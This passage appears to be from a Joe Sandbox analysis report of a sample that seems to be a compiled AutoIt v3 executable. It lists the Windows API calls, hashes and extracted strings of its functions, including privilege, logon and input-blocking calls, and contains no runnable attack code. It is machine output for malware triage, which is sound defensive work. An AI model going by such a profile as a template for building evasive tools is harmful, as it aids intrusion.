                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ErrorFormatLastMessage
                                                            • String ID:
                                                            • API String ID: 3479602957-0
                                                            • Opcode ID: 74b2c3d6437fd0b0c216f4d6343ce8878591610b31734c06c0e5ced2a084cc84
                                                            • Instruction ID: 57c6d847958bf0824c5fff0b609a6985639d7046487f5879afe20dc77403214d
                                                            • Opcode Fuzzy Hash: 74b2c3d6437fd0b0c216f4d6343ce8878591610b31734c06c0e5ced2a084cc84
                                                            • Instruction Fuzzy Hash: 7FF0E23555432DBBDB209FA4CC49FEA736DBF09761F0042A6B808D2181D7309A00CBA1
                                                            APIs
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,001F8851), ref: 001F8728
                                                            • CloseHandle.KERNEL32(?,?,001F8851), ref: 001F873A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: AdjustCloseHandlePrivilegesToken
                                                            • String ID:
                                                            • API String ID: 81990902-0
                                                            • Opcode ID: 3948d6a08721bfb54f434dabc38577eddfc9319dab7f18b640de458ab10efa1b
                                                            • Instruction ID: 2aafad5c9d07b44f570ac675fbddecbe764f9b5f6c87c6aae6ac3651c175de56
                                                            • Opcode Fuzzy Hash: 3948d6a08721bfb54f434dabc38577eddfc9319dab7f18b640de458ab10efa1b
                                                            • Instruction Fuzzy Hash: 86E04632000600FEE7312B60FD09E737BA9EB04350720883DB89680431CB22ACA1DB10
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,001C8F97,?,?,?,00000001), ref: 001CA39A
                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 001CA3A3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: d92ad23ea056af1b5da4813d3b540f95a6c32d0ae9ae30da88617225d5e210be
                                                            • Instruction ID: 1e8844587800aa867b2803635618a4e519b682d0f7828df493b6e91684228986
                                                            • Opcode Fuzzy Hash: d92ad23ea056af1b5da4813d3b540f95a6c32d0ae9ae30da88617225d5e210be
                                                            • Instruction Fuzzy Hash: FCB09231054248FBCAA06BD1FD0DB883F78EB44AA2F4050B0FE0D84060CB6254528A91
                                                            APIs
                                                            • BlockInput.USER32(00000001), ref: 00214218
                                                            Similarity
                                                            • API ID: BlockInput
                                                            • String ID:
                                                            • API String ID: 3456056419-0
                                                            APIs
                                                            • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00204F18
                                                            Similarity
                                                            • API ID: mouse_event
                                                            • String ID:
                                                            • API String ID: 2434400541-0
                                                            APIs
                                                            • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,001F88D1), ref: 001F8CB3
                                                            Similarity
                                                            • API ID: LogonUser
                                                            • String ID:
                                                            • API String ID: 1244722697-0
                                                            APIs
                                                            • GetUserNameW.ADVAPI32(?,?), ref: 001E2242
                                                            Similarity
                                                            • API ID: NameUser
                                                            • String ID:
                                                            • API String ID: 2645101109-0
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(?), ref: 001CA36A
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            APIs
                                                            • DeleteObject.GDI32(00000000), ref: 00217B70
                                                            • DeleteObject.GDI32(00000000), ref: 00217B82
                                                            • DestroyWindow.USER32 ref: 00217B90
                                                            • GetDesktopWindow.USER32 ref: 00217BAA
                                                            • GetWindowRect.USER32(00000000), ref: 00217BB1
                                                            • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00217CF2
                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00217D02
                                                            • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00217D4A
                                                            • GetClientRect.USER32(00000000,?), ref: 00217D56
                                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00217D90
                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00217DB2
                                                            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00217DC5
                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00217DD0
                                                            • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00217DD9
                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00217DE8
                                                            • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00217DF1
                                                            • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00217DF8
                                                            • GlobalFree.KERNEL32(00000000), ref: 00217E03
                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00217E15
                                                            • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00232CAC,00000000), ref: 00217E2B
                                                            • GlobalFree.KERNEL32(00000000), ref: 00217E3B
                                                            • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00217E61
                                                            • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00217E80
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00217EA2
                                                            • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0021808F
                                                            Strings
                                                            Similarity
                                                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                            • API String ID: 2211948467-2373415609
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?,0022F910), ref: 002238AF
                                                            • IsWindowVisible.USER32(?), ref: 002238D3
                                                            Strings
                                                            Similarity
                                                            • API ID: BuffCharUpperVisibleWindow
                                                            • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                            • API String ID: 4105515805-45149045
                                                            APIs
                                                            • SetTextColor.GDI32(?,00000000), ref: 0022A89F
                                                            • GetSysColorBrush.USER32(0000000F), ref: 0022A8D0
                                                            • GetSysColor.USER32(0000000F), ref: 0022A8DC
                                                            • SetBkColor.GDI32(?,000000FF), ref: 0022A8F6
                                                            • SelectObject.GDI32(?,?), ref: 0022A905
                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 0022A930
                                                            • GetSysColor.USER32(00000010), ref: 0022A938
                                                            • CreateSolidBrush.GDI32(00000000), ref: 0022A93F
                                                            • FrameRect.USER32(?,?,00000000), ref: 0022A94E
                                                            • DeleteObject.GDI32(00000000), ref: 0022A955
                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 0022A9A0
                                                            • FillRect.USER32(?,?,?), ref: 0022A9D2
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0022A9FD
                                                              • Part of subcall function 0022AB60: GetSysColor.USER32(00000012), ref: 0022AB99
                                                              • Part of subcall function 0022AB60: SetTextColor.GDI32(?,?), ref: 0022AB9D
                                                              • Part of subcall function 0022AB60: GetSysColorBrush.USER32(0000000F), ref: 0022ABB3
                                                              • Part of subcall function 0022AB60: GetSysColor.USER32(0000000F), ref: 0022ABBE
                                                              • Part of subcall function 0022AB60: GetSysColor.USER32(00000011), ref: 0022ABDB
                                                              • Part of subcall function 0022AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0022ABE9
                                                              • Part of subcall function 0022AB60: SelectObject.GDI32(?,00000000), ref: 0022ABFA
                                                              • Part of subcall function 0022AB60: SetBkColor.GDI32(?,00000000), ref: 0022AC03
                                                              • Part of subcall function 0022AB60: SelectObject.GDI32(?,?), ref: 0022AC10
                                                              • Part of subcall function 0022AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 0022AC2F
                                                              • Part of subcall function 0022AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0022AC46
                                                              • Part of subcall function 0022AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 0022AC5B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                            • String ID:
                                                            • API String ID: 4124339563-0
                                                            • Opcode ID: 6599ae59dc939f9c18c972d442aadb5a4c0bcb026b8dd0828af19af3e99be3d7
                                                            • Instruction ID: 0cf6c2106a1cdfddbd8e3f61ebeaff0a5a974c6bb22c97bd0ed36a25777c10fa
                                                            • Opcode Fuzzy Hash: 6599ae59dc939f9c18c972d442aadb5a4c0bcb026b8dd0828af19af3e99be3d7
                                                            • Instruction Fuzzy Hash: A5A1AD72008311BFD7609FA4ED0CE6B7BB9FF88320F501A29F962961A0D774D955CB52
                                                            APIs
                                                            • DestroyWindow.USER32(?,?,?), ref: 001A2CA2
                                                            • DeleteObject.GDI32(00000000), ref: 001A2CE8
                                                            • DeleteObject.GDI32(00000000), ref: 001A2CF3
                                                            • DestroyIcon.USER32(00000000,?,?,?), ref: 001A2CFE
                                                            • DestroyWindow.USER32(00000000,?,?,?), ref: 001A2D09
                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 001DC68B
                                                            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 001DC6C4
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 001DCAED
                                                              • Part of subcall function 001A1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,001A2036,?,00000000,?,?,?,?,001A16CB,00000000,?), ref: 001A1B9A
                                                            • SendMessageW.USER32(?,00001053), ref: 001DCB2A
                                                            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 001DCB41
                                                            • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 001DCB57
                                                            • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 001DCB62
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                            • String ID: 0
                                                            • API String ID: 464785882-4108050209
                                                            • Opcode ID: 27181d7801832a6ae2a8a250de64cf9c38e8ba09a8d8d56d6cda0302e4a754ca
                                                            • Instruction ID: a8e5352732addb88c5363b2e59b48eb67e09a0f6666890a4a564862a71973478
                                                            • Opcode Fuzzy Hash: 27181d7801832a6ae2a8a250de64cf9c38e8ba09a8d8d56d6cda0302e4a754ca
                                                            • Instruction Fuzzy Hash: CA12AC34600202EFDB25CF28C988BA9BBE5BF45310F54497AF895DB662C731EC52DB90
                                                            APIs
                                                            • DestroyWindow.USER32(00000000), ref: 002177F1
                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 002178B0
                                                            • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 002178EE
                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00217900
                                                            • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00217946
                                                            • GetClientRect.USER32(00000000,?), ref: 00217952
                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00217996
                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 002179A5
                                                            • GetStockObject.GDI32(00000011), ref: 002179B5
                                                            • SelectObject.GDI32(00000000,00000000), ref: 002179B9
                                                            • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 002179C9
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002179D2
                                                            • DeleteDC.GDI32(00000000), ref: 002179DB
                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00217A07
                                                            • SendMessageW.USER32(00000030,00000000,00000001), ref: 00217A1E
                                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00217A59
                                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00217A6D
                                                            • SendMessageW.USER32(00000404,00000001,00000000), ref: 00217A7E
                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00217AAE
                                                            • GetStockObject.GDI32(00000011), ref: 00217AB9
                                                            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00217AC4
                                                            • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00217ACE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                            • API String ID: 2910397461-517079104
                                                            • Opcode ID: b7426d0bebac03f85a974a07a307afba979404c7b45a0cc194ed6e03fd89f173
                                                            • Instruction ID: 97e2e156a067de1a6414c6c4eedbf83263dae7aee4b51cfcc8f5e44b4a9cbcf3
                                                            • Opcode Fuzzy Hash: b7426d0bebac03f85a974a07a307afba979404c7b45a0cc194ed6e03fd89f173
                                                            • Instruction Fuzzy Hash: F6A17171A40215BFEB149FA4ED4EFAE7BB9EB45710F008224FA14A71E0C7B0AD51CB60
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0020AF89
                                                            • GetDriveTypeW.KERNEL32(?,0022FAC0,?,\\.\,0022F910), ref: 0020B066
                                                            • SetErrorMode.KERNEL32(00000000,0022FAC0,?,\\.\,0022F910), ref: 0020B1C4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$DriveType
                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                            • API String ID: 2907320926-4222207086
                                                            • Opcode ID: 5430cee75d57348ee0aa00b9273b6b5d6f0e1551ba053b651904f0673479f06f
                                                            • Instruction ID: 1be0ea6aa20df9df77d3ea7afaa0ed95e500400154b48aa8335917c0b1b4341d
                                                            • Opcode Fuzzy Hash: 5430cee75d57348ee0aa00b9273b6b5d6f0e1551ba053b651904f0673479f06f
                                                            • Instruction Fuzzy Hash: 4551BF346B4306ABCB21DF10CAA387DF3B1AB1B342B204115E80EA72D2D7B59D75CB56
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: __wcsnicmp
                                                            • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                            • API String ID: 1038674560-86951937
                                                            • Opcode ID: c5db61bab22f3db7de2952c4292753a230595dc24007dd56a6875925994596a8
                                                            • Instruction ID: 1c3f022d643d19e5ba581edb05a35342e19ebef0bf55c086f9d7578801d7b795
                                                            • Opcode Fuzzy Hash: c5db61bab22f3db7de2952c4292753a230595dc24007dd56a6875925994596a8
                                                            • Instruction Fuzzy Hash: E981FC74740215BBCB25BB60CD83FAE77A9AF37701F084025FD45AB1C2EB60DA55C6A1
                                                            APIs
                                                            • GetSysColor.USER32(00000012), ref: 0022AB99
                                                            • SetTextColor.GDI32(?,?), ref: 0022AB9D
                                                            • GetSysColorBrush.USER32(0000000F), ref: 0022ABB3
                                                            • GetSysColor.USER32(0000000F), ref: 0022ABBE
                                                            • CreateSolidBrush.GDI32(?), ref: 0022ABC3
                                                            • GetSysColor.USER32(00000011), ref: 0022ABDB
                                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0022ABE9
                                                            • SelectObject.GDI32(?,00000000), ref: 0022ABFA
                                                            • SetBkColor.GDI32(?,00000000), ref: 0022AC03
                                                            • SelectObject.GDI32(?,?), ref: 0022AC10
                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 0022AC2F
                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0022AC46
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0022AC5B
                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0022ACA7
                                                            • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0022ACCE
                                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 0022ACEC
                                                            • DrawFocusRect.USER32(?,?), ref: 0022ACF7
                                                            • GetSysColor.USER32(00000011), ref: 0022AD05
                                                            • SetTextColor.GDI32(?,00000000), ref: 0022AD0D
                                                            • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0022AD21
                                                            • SelectObject.GDI32(?,0022A869), ref: 0022AD38
                                                            • DeleteObject.GDI32(?), ref: 0022AD43
                                                            • SelectObject.GDI32(?,?), ref: 0022AD49
                                                            • DeleteObject.GDI32(?), ref: 0022AD4E
                                                            • SetTextColor.GDI32(?,?), ref: 0022AD54
                                                            • SetBkColor.GDI32(?,?), ref: 0022AD5E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                            • String ID:
                                                            • API String ID: 1996641542-0
                                                            • Opcode ID: 3dbc25597677e4b398a9ea0434a3113f67d5ff25d4b9649764f20dfdb8db297e
                                                            • Instruction ID: 08c23f1f19636d32d050e3d35387c8c118bac947d5fc85f442fbd37ba92810b0
                                                            • Opcode Fuzzy Hash: 3dbc25597677e4b398a9ea0434a3113f67d5ff25d4b9649764f20dfdb8db297e
                                                            • Instruction Fuzzy Hash: E5617C71900219FFDB219FE8ED48EAEBB79FB08320F104126F915AB2A1D6759951CF90
                                                            APIs
                                                            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00228D34
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00228D45
                                                            • CharNextW.USER32(0000014E), ref: 00228D74
                                                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00228DB5
                                                            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00228DCB
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00228DDC
                                                            • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00228DF9
                                                            • SetWindowTextW.USER32(?,0000014E), ref: 00228E45
                                                            • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00228E5B
                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00228E8C
                                                            • _memset.LIBCMT ref: 00228EB1
                                                            • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00228EFA
                                                            • _memset.LIBCMT ref: 00228F59
                                                            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00228F83
                                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 00228FDB
                                                            • SendMessageW.USER32(?,0000133D,?,?), ref: 00229088
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 002290AA
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 002290F4
                                                            • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00229121
                                                            • DrawMenuBar.USER32(?), ref: 00229130
                                                            • SetWindowTextW.USER32(?,0000014E), ref: 00229158
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                            • String ID: 0
                                                            • API String ID: 1073566785-4108050209
                                                            • Opcode ID: 69684d19559957b0a5e66408d74a5a71a676656bbea567ee24ed96f86211f11a
                                                            • Instruction ID: 06d6000ac46b12d5ca413d2b9b87aba3cc73d59cbc2b42e2ad1eb5cb06730f78
                                                            • Opcode Fuzzy Hash: 69684d19559957b0a5e66408d74a5a71a676656bbea567ee24ed96f86211f11a
                                                            • Instruction Fuzzy Hash: FCE1C670911229BBDF209FA1EC88EEE7B79EF15710F008159F91996190DB70C9A5DF60
                                                            APIs
                                                            • GetCursorPos.USER32(?), ref: 00224C51
                                                            • GetDesktopWindow.USER32 ref: 00224C66
                                                            • GetWindowRect.USER32(00000000), ref: 00224C6D
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00224CCF
                                                            • DestroyWindow.USER32(?), ref: 00224CFB
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00224D24
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00224D42
                                                            • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00224D68
                                                            • SendMessageW.USER32(?,00000421,?,?), ref: 00224D7D
                                                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00224D90
                                                            • IsWindowVisible.USER32(?), ref: 00224DB0
                                                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00224DCB
                                                            • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00224DDF
                                                            • GetWindowRect.USER32(?,?), ref: 00224DF7
                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 00224E1D
                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 00224E37
                                                            • CopyRect.USER32(?,?), ref: 00224E4E
                                                            • SendMessageW.USER32(?,00000412,00000000), ref: 00224EB9
                                                            Strings
                                                            Memory Dump Source
